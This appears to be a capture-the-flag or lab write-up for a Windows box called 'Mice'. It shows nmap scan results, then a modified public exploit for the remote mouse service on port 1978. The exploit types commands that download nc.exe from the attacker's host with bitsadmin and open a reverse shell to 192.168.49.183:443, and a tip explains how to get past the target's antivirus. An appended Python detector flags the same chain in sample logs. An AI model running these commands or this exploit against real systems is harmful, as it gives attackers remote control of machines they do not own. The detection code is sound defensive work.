Mice (Windows)
1978/tcp open unisql?
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s:
|_ SIN 15win nop nop 300
1979/tcp open unisql-java?
1980/tcp open pearldoc-xact?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after: 2022-11-16T00:09:34
7680/tcp open pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Port 1978 has a public exploit.
Modify the exploit script as follows:
from time import sleep
# MoveMouse, MousePress, SendString and the mouse object are provided by the
# original exploit script this function is dropped into; they are not redefined here.

# Commands typed into the remote cmd.exe, one at a time
cmd1 = 'mkdir c:\\pwn'
cmd2 = 'bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3 = 'c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'

def PopCalc(ip):
    # Move the cursor to the far bottom-left and click, then type cmd.exe and Enter
    # to open a command prompt
    MoveMouse(-5000, 3000, ip)
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString("cmd.exe", ip)
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    # Create the staging directory
    SendString(cmd1, ip)
    sleep(1)
    SendString("\n", ip)
    sleep(1)
    # Fetch nc.exe with bitsadmin; the long sleep gives the transfer time to finish
    SendString(cmd2, ip)
    sleep(1)
    SendString("\n", ip)
    sleep(25)
    # Launch the reverse shell back to the listener
    SendString(cmd3, ip)
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS!", ip)
Because of the antivirus setting on the target, nc.exe has to be hosted on an actual web server (Apache) rather than the Python built-in web server, or the download won't work.
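As an added example that is not part of the original writeup, the following Python flags the staged chain the modified script drives (a bitsadmin download of an executable followed by that binary running with -e cmd.exe) when run over constructed process-creation log lines; the pipe-separated time|host|parent|commandline layout is an assumed schema, not a real product format.

```python
# Added example, not part of the original writeup: flag the bitsadmin /transfer
# download of an .exe into c:\pwn and the later "-e cmd.exe" execution of that
# binary in process-creation logs. Log lines are constructed; the pipe-separated
# time|host|parent|commandline layout is an assumed schema, not a real product format.
import re
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2022-05-18T16:20:01|REMOTE-PC|explorer.exe|C:\\Windows\\System32\\cmd.exe
2022-05-18T16:20:03|REMOTE-PC|cmd.exe|bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe
2022-05-18T16:20:30|REMOTE-PC|cmd.exe|c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443
2022-05-18T16:21:00|FILESRV|cmd.exe|bitsadmin /transfer upd /download https://intranet.example/agent.msi c:\\temp\\agent.msi
"""

# bitsadmin download: capture the source URL and the local destination path
BITS_DL = re.compile(r"bitsadmin\s.*?/transfer\b.*?/download\b.*?(https?://\S+)\s+(\S+)", re.I)
# netcat-style "<binary> -e cmd.exe" (or powershell) invocation
SHELL_EXEC = re.compile(r"^(\S+\.exe)\s+-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.I)
WINDOW = timedelta(minutes=5)  # download-to-execution correlation window

def detect(log_text):
    """Return a list of (host, severity, reason) findings, in log order."""
    findings, downloads = [], {}  # downloads: (host, lowercased dest path) -> time
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, _parent, cmd = line.split("|", 3)
        ts = datetime.fromisoformat(ts)
        m = BITS_DL.search(cmd)
        if m:
            url, dest = m.groups()
            downloads[(host, dest.lower())] = ts
            if dest.lower().endswith(".exe"):
                findings.append((host, "medium", f"bitsadmin fetched executable {dest} from {url}"))
            continue
        m = SHELL_EXEC.match(cmd)
        if m:
            exe = m.group(1).lower()
            t0 = downloads.get((host, exe))
            if t0 is not None and ts - t0 <= WINDOW:
                findings.append((host, "high", f"{exe} downloaded via BITS then run with -e cmd.exe"))
            else:
                findings.append((host, "high", f"shell-spawning -e pattern: {cmd}"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```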